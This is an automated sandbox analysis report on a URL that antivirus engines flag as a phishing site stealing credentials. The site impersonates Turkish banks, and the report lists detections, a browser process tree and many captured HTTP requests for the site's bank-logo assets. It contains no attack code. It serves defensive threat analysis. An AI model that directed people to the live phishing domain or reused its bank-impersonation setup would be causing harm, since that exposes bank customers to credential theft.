Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ogs.com.tc/

Overview

General Information

Sample URL:https://ogs.com.tc/
Analysis ID:1447546
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2252,i,3500489096609477459,16314723359328106391,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ogs.com.tc/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: https://ogs.com.tc/Avira URL Cloud: detection malicious, Label: phishing
Source: https://ogs.com.tc/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Antivirus detection for URL or domain
Source: https://ogs.com.tc/assets/images/banks/teb.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/albaraka.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/akbank.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/alternatif.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/turkiyefinans.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/fiba.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/halk.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/js/script.jsAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/favicon-196x196.pngAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/garanti.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/kuveyt.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/deniz.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/vakif.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/finans.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/sekerbank.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/ykb.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/1.pngAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/ziraat.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/anadolu.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/ing.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/hsbc.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/isbank.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/edkkds.svgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/odea.jpgAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/css/style.cssAvira URL Cloud: Label: phishing
Source: https://ogs.com.tc/assets/images/banks/ptt.jpgAvira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: ogs.com.tcVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for submitted file
Source: https://ogs.com.tc/Virustotal: Detection: 14%Perma Link
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49779 version: TLS 1.0
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49779 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/style.css HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/akbank.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/albaraka.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/alternatif.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/anadolu.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/deniz.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/1.png HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/akbank.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/vakif.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/edkkds.svg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/albaraka.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ing.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/alternatif.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/sekerbank.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/kuveyt.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/deniz.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/anadolu.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/1.png HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/turkiyefinans.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ykb.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ziraat.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/teb.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ptt.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /assets/images/banks/odea.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/isbank.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/vakif.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/kuveyt.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/edkkds.svg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/ing.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/sekerbank.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/turkiyefinans.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/script.js HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/fiba.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/banks/finans.jpg HTTP/1.1Host: ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
